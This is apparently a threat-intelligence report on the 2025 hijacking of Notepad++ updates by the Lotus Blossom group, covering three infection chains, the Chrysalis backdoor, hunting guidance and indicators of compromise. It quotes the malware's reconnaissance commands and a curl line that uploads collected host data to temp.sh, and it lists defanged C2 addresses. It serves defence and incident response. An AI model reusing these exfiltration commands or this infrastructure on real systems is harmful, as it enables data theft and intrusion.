Executive Summary
On February 2, 2026, the developers of Notepad++, a widely used text editor among software developers, published a public statement confirming that the project’s update infrastructure had been compromised.
Table of Contents
According to the disclosure, the incident originated from a hosting provider–level compromise that occurred between June and September 2025. Although remediation efforts were initiated, attackers retained access to internal services until December 2025, enabling prolonged abuse of the update mechanism.
This access was leveraged to distribute malicious Notepad++ updates, resulting in a targeted supply chain attack affecting selected victims across multiple regions and sectors.
The activity has been attributed with high confidence to the Chinese advanced persistent threat (APT) group Lotus Blossom, an espionage-focused actor active since at least 2009.
The compromise led to the deployment of a previously undocumented custom backdoor, dubbed Chrysalis, along with multiple custom loaders employing advanced obfuscation techniques, including Microsoft Warbird. The campaign demonstrates a blend of bespoke malware, commodity offensive frameworks, and evolving evasion tradecraft, highlighting a clear maturation of the group’s operational capabilities.
Threat Actor Overview: Lotus Blossom
Lotus Blossom is a China-nexus espionage group historically targeting organizations across Southeast Asia, with more recent activity expanding into Central America. Known target sectors include:
- Government and public administration
- Telecommunications
- Aviation
- Critical infrastructure
- Media and information services
The group is characterized by long-term persistence, selective targeting, and the combined use
of custom-developed malware and publicly available offensive tooling.
High-Level Attack Characteristics
Analysis of telemetry and forensic data revealed an unusually diverse and adaptive attack, characterized by:
- Multiple distinct execution chains
- Frequent rotation of:
- C2 infrastructure
- Download URLs
- Loader mechanisms
- Final-stage payloads
- Targeted distribution rather than indiscriminate mass infection
Over a four-month period (July–October 2025), attackers continuously modified their tradecraft to maintain access while reducing detection risk.
Victimology
Observed infections were limited in number (approximately a dozen machines) and targeted specific entities, including:
- Individual users located in:
- Vietnam
- El Salvador
- Australia
- A government organization in the Philippines
- A financial organization in El Salvador
- An IT services provider in Vietnam
The narrow targeting and rapid evolution of execution chains strongly suggest a deliberate, intelligence-driven operation rather than opportunistic malware distribution.
Affected Versions
| Version | Status | Notes |
| < v8.8.7 | Vulnerable | Self-signed certificate, no proper verification |
| v8.8.7 | Vulnerable | GlobalSign cert added, but no installer verification |
| v8.8.8 | Vulnerable | Downloads from GitHub only, still no verification |
| v8.8.9+ | Fixed | Certificate and signature verification enforced |
| v8.9.1 | Current | Recommended (self-signed cert removed in v8.9) |
Infection Chain #1 – Late July to Early August 2025
Initial Payload Delivery
The first observed malicious update appeared in late July 2025, distributed from:
http[:]//45[.]76[.]155[.]202/update/update.exe
The file (SHA1: 8e6e505438c21f3d281e1cc257abdbf7223b7f5a) was executed via the legitimate Notepad++ updater process (GUP.exe) and was identified as an NSIS installer approximately 1 MB in size.
System Profiling and Exfiltration
Upon execution, the installer performed the following actions:
- Created %APPDATA%\ProShow and set it as the working directory
- Executed: cmd /c whoami&&tasklist > 1.txt
- Uploaded 1.txt to temp[.]sh using: curl.exe -F "[email protected]" -s hxxps[:]//temp[.]sh/upload
- Transmitted the resulting upload URL back to the attacker via an HTTP request to: hxxp[:]//45[.]76[.]155[.]202
with the uploaded file URL embedded inside the User-Agent header
This unconventional use of the User-Agent field was later corroborated by community reports.
Second-Stage Payload: ProShow Exploitation
Following reconnaissance, the installer dropped several files into %APPDATA%\ProShow, including:
- ProShow.exe (legitimate software)
- load (malicious exploit payload)
- Supporting legitimate ProShow resource files
Instead of using DLL sideloading, attackers exploited a legacy vulnerability in ProShow software dating back to the early 2010s. The malicious load file contained two shellcodes:
- A decoy shellcode used as padding to mislead analysis
- An active shellcode, triggered upon ProShow execution
The active shellcode decrypted and executed a Metasploit downloader, which retrieved a Cobalt Strike Beacon shellcode.
Command-and-Control
Observed C2 infrastructure included:
- Initial payload delivery: hxxps[:]//45[.]77[.]31[.]210/users/admin
- Beacon communication: GET-/api/update/v1 & POST-/api/FileUpload/submit
In early August 2025, this infrastructure was migrated to cdncheck.it[.]com, with updated endpoints but an otherwise identical execution chain.
No further activity using Chain #1 was observed after early August.
Infection Chain #2 – Mid to Late September 2025
Updated NSIS Installer
In mid-September 2025, attackers resumed malicious update distribution using a new execution chain, again via:
Hxxp[:]//45[.]76[.]155[.]202/update/update.exe
The new installer (SHA1: 573549869e84544e3ef253bdba79851dcde4963a) was significantly smaller (~140 KB).
Expanded Host Reconnaissance
Key changes included:
- Working directory changed to:
- %APPDATA%\Adobe\Scripts
- More extensive system profiling:
- cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
The output was uploaded to temp[.]sh, with the resulting URL again transmitted inside the User-Agent header to a remote endpoint.
Lua-Based Shellcode Loader
The installer dropped several legitimate Lua interpreter components along with a malicious configuration file:
- alien.dll
- lua5.1.dll
- script.exe
- alien.ini (malicious)
The following command was executed:
script.exe alien.ini
The compiled Lua script allocated executable memory, injected shellcode, and launched it via the EnumWindowStationsW API.
This shellcode again acted as a Metasploit downloader, retrieving a Cobalt Strike Beacon.
Infrastructure Evolution
Throughout late September, attackers made incremental changes:
- Split reconnaissance commands into multiple executions
- Migrated infrastructure to:
- self-dns.it[.]com
- safe-dns.it[.]com
- Updated User-Agent strings to newer browser versions
- Modified Cobalt Strike endpoints to resemble DNS and resolver services
Infection Chain #3 – October 2025
Transition to Custom Backdoor Deployment
In early October 2025, attackers introduced a third execution chain, delivered from:
Hxxp[:]//45[.]32[.]144[.]255/update/update.exe
Unlike previous chains, this NSIS installer did not perform system profiling.
Instead, it dropped the following into %APPDATA%\Bluetooth:
- BluetoothService.exe (legitimate executable)
- log.dll (malicious)
- BluetoothService (encrypted shellcode)
Execution relied on DLL sideloading, a technique frequently observed in campaigns attributed to Chinese-speaking threat actors.
Final Payload: Chrysalis Backdoor
The malicious log.dll decrypted and injected the shellcode into BluetoothService.exe, deploying the custom backdoor known as Chrysalis.
Unlike Chains #1 and #2, this execution path did not directly load a Cobalt Strike Beacon. However, forensic evidence from at least one affected host indicates that Cobalt Strike was later deployed as a secondary payload, using a Metasploit loader and infrastructure closely resembling earlier chains.
Notable similarities included:
- Identical XOR encryption key (CRAZY)
- Comparable /users/admin download paths
- Matching Cobalt Strike POST endpoints
update.exe Analysis
Analysis revealed that update.exe is a Nullsoft Scriptable Install System (NSIS) installer. NSIS installers are frequently used by advanced threat actors to deliver staged payloads due to their flexibility and ability to blend in with legitimate software installers.
Extracted Installer Components
| File Name | Description | SHA-256 |
| [NSIS].nsi | NSIS installation script | 8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e |
| BluetoothService.exe | Renamed legitimate executable used for DLL sideloading | 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924 |
| BluetoothService | Encrypted shellcode | 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e |
| log.dll | Malicious DLL sideloaded by BluetoothService.exe | 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad |
Installation Logic
The installer performs the following actions:
- Creates a directory named Bluetooth under %AppData%
- Copies all payload files into this directory
- Sets the directory attribute to HIDDEN
- Executes BluetoothService.exe, triggering DLL sideloading of log.dll
Chrysalis Backdoor Analysis
Loader and Execution Chain
The malicious DLL log.dll decrypts and executes embedded shellcode, loading a custom backdoor referred to as Chrysalis.
Key characteristics include:
- Use of legitimate binaries for DLL sideloading
- Generic module naming to evade filename-based detection
- Custom API hashing in both the loader and main module, each using distinct resolution logic
- Layered obfuscation and structured command-and-control (C2) communications
These characteristics indicate a mature, actively maintained malware family rather than a disposable implant.
Command and Control Configuration
| Parameter | Value |
| Module Name | BluetoothService |
| C2 URL | hxxps[:]//api[.]skycloudcenter[.]com/a/chat/s/{GUID} |
| User-Agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4044.92 Safari/537.36 |
The C2 URL structure closely resembles API-based chat endpoints (e.g., /a/chat/s/{GUID}), suggesting deliberate traffic masquerading to blend with legitimate web API traffic.
At the time of analysis, the domain resolved to 61[.]4[.]102[.]97, an IP address located in Malaysia. No additional samples were observed communicating with this endpoint.
Host Profiling and Beaconing Behavior
Upon execution, Chrysalis collects the following system information:
- Current system time
- Installed antivirus products
- Operating system version
- Username
- Computer name
The malware concatenates the computer name, username, OS version, and a static version string (1.01), hashes the result using the FNV-1A algorithm, and converts the hash into a decimal ASCII representation. This value is used as a unique host identifier and encryption key for subsequent communications.
Encrypted data is transmitted over HTTPS (TCP port 443) using HttpSendRequestA with the POST method.
C2 Response Handling and Command Set
Response Validation
The malware validates responses by:
- Verifying HTTP status code 200
- Validating the associated WinInet handle
- Confirming payload structure integrity
A tag embedded in the response determines execution flow via a switch statement containing 16 possible command cases.
Additional Post-Compromise Tooling
Abuse of Tiny C Compiler
The following command execution was observed:
C:\ProgramData\USOShared\svchost.exe -nostdlib -run conf.c
Analysis determined that:
- svchost.exe was a renamed Tiny C Compiler (TCC)
- libtcc.dll confirmed compiler functionality
- conf.c was compiled and executed in memory
conf.c Payload Analysis
The C source file contains an embedded shellcode buffer, which is cast to a function pointer and executed. The shellcode is consistent with a 32-bit Metasploit block API payload.
The shellcode:
- Loads WinInet APIs dynamically
- Downloads a second-stage payload from api.wiresguard.com
- Transfers execution to the downloaded payload
Decrypted configuration confirms the payload as a Cobalt Strike HTTPS beacon, using the following endpoints:
- HTTP GET: /update/v1
- HTTP POST: /api/FileUpload/submit
Conclusion
This incident represents a highly adaptive and carefully managed supply chain attack. By compromising a trusted software update mechanism, attackers gained access to systems belonging to high-value individuals and organizations.
Key takeaways:
- Attackers rotated execution chains approximately once per month
- Both custom malware (Chrysalis) and commodity frameworks (Metasploit, Cobalt Strike) were used
- Multiple loading techniques were employed:
- Legacy software exploitation
- Lua-based in-memory execution
- DLL sideloading
- Infrastructure was continuously modified to evade detection
The limited scale of infections suggests that access to the update channel was treated as a sensitive and asset, used sparingly and strategically.
Remediation
Primary Action: Update to Notepad++ v8.9.1 immediately via manual download from the official website or GitHub releases.
| Situation | Action |
| Running version < v8.8.9 | Update to v8.9.1 via manual download |
| Updated during June–December 2025 | Audit system for compromise indicators, then update |
| Previously installed self-signed cert | Remove old Notepad++ root certificate from certificate store |
| Enterprise deployment | Consider centralized package management; block gup.exe network access |
Detection and Hunting Recommendations
To identify potential compromises related to this campaign, defenders should consider the following:
Generic Hunting
- Investigate execution of NSIS installers, particularly those creating:
- %LOCALAPPDATA%\Temp\ns*.tmp
- Validate the origin of all NSIS-based installers to reduce false positives
- %appdata%\ProShow\load
- %appdata%\Adobe\Scripts\alien.ini
- %appdata%\Bluetooth\BluetoothService
Network-Based Detection
- Search for DNS or HTTP traffic involving temp[.]sh
- Look for HTTP requests with URLs embedded in User-Agent headers
- Monitor for suspicious updater-related traffic to unfamiliar IPs or domains
IOCs
| Type | Name | Value |
| Binary | update.exe | a511be5164dc1122fb5a7daa3eef9467e43d8458425b15a640235796006590c9 |
| Binary | [NSIS.nsi] | 8ea8b83645fba6e23d48075a0d3fc73ad2ba515b4536710cda4f1f232718f53e |
| Binary | BluetoothService.exe | 2da00de67720f5f13b17e9d985fe70f10f153da60c9ab1086fe58f069a156924 |
| Binary | BluetoothService | 77bfea78def679aa1117f569a35e8fd1542df21f7e00e27f192c907e61d63a2e |
| Binary | log.dll | 3bdc4c0637591533f1d4198a72a33426c01f69bd2e15ceee547866f65e26b7ad |
| Binary | u.bat | 9276594e73cda1c69b7d265b3f08dc8fa84bf2d6599086b9acc0bb3745146600 |
| Binary | conf.c | f4d829739f2d6ba7e3ede83dad428a0ced1a703ec582fc73a4eee3df3704629a |
| Binary | libtcc.dll | 4a52570eeaf9d27722377865df312e295a7a23c3b6eb991944c2ecd707cc9906 |
| Binary | admin | 831e1ea13a1bd405f5bda2b9d8f2265f7b1db6c668dd2165ccc8a9c4c15ea7dd |
| Binary | loader1 | 0a9b8df968df41920b6ff07785cbfebe8bda29e6b512c94a3b2a83d10014d2fd |
| Binary | uffhxpSy | 4c2ea8193f4a5db63b897a2d3ce127cc5d89687f380b97a1d91e0c8db542e4f8 |
| Binary | loader2 | e7cd605568c38bd6e0aba31045e1633205d0598c607a855e2e1bca4cca1c6eda |
| Binary | 3yzr31vk | 078a9e5c6c787e5532a7e728720cbafee9021bfec4a30e3c2be110748d7c43c5 |
| Binary | ConsoleApplication2.exe | b4169a831292e245ebdffedd5820584d73b129411546e7d3eccf4663d5fc5be3 |
| Binary | system | 7add554a98d3a99b319f2127688356c1283ed073a084805f14e33b4f6a6126fd |
| Binary | s047t5g.exe | fcc2765305bcd213b7558025b2039df2265c3e0b6401e4833123c461df2de51a |
| IP | 95.179.213.0 | |
| URL | api[.]skycloudcenter[.]com | |
| URL | api[.]wiresguard[.]com | |
| IP | 61.4.102.97 | |
| IP | 59.110.7.32 | |
| IP | 124.222.137.114 | |
| URL | hxxp[:]//45[.]76[.]155[.]202/update/update.exe | |
| URL | hxxp[:]//45[.]32[.]144[.]255/update/update.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/update.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/install.exe | |
| URL | hxxp[:]//95[.]179[.]213[.]0/update/AutoUpdater.exe | |
| URL | hxxp[:]//45[.]76[.]155[.]202/list | |
| URL | hxxps[:]//self-dns[.]it[.]com/list | |
| URL | hxxps[:]//45[.]77[.]31[.]210/users/admin | |
| URL | hxxps[:]//cdncheck[.]it[.]com/users/admin | |
| URL | hxxps[:]//safe-dns[.]it[.]com/help/Get-Start | |
| URL | hxxps[:]//45[.]77[.]31[.]210/api/update/v1 | |
| URL | hxxps[:]//45[.]77[.]31[.]210/api/FileUpload/submit | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/update/v1 | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/Metadata/submit | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/getInfo/v1 | |
| URL | hxxps[:]//cdncheck[.]it[.]com/api/FileUpload/submit | |
| URL | hxxps[:]//safe-dns[.]it[.]com/resolve | |
| URL | Hxxps[:]//safe-dns[.]it[.]com/dns-query |
| URL | hxxps[:]//api[.]skycloudcenter[.]com/a/chat/s/70521ddf-a2ef-4adf-9cf0-6d8e24aaa821 | |
| URL | hxxps[:]//api[.]wiresguard[.]com/update/v1 | |
| URL | hxxps[:]//api[.]wiresguard[.]com/api/FileUpload/submit | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/uffhxpSy | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/api/getBasicInfo/v1 | |
| URL | hxxp[:]//59[.]110[.]7[.]32:8880/api/Metadata/submit | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/3yZR31VK | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/api/updateStatus/v1 | |
| URL | hxxp[:]//124[.]222[.]137[.]114:9999/api/Info/submit | |
| URL | hxxps[:]//api[.]wiresguard[.]com/users/system | |
| URL | hxxps[:]//api[.]wiresguard[.]com/api/getInfo/v1 |
References:
hxxps[:]//notepad-plus-plus[.]org/news/hijacked-incident-info-update/
hxxps[:]//orca[.]security/resources/blog/notepad-plus-plus-supply-chain-attack/
hxxps[:]//securelist[.]com/notepad-supply-chain-attack/118708/
hxxps[:]//www[.]rapid7[.]com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
hxxps[:]//nvd[.]nist[.]gov/vuln/detail/CVE-2025-56383
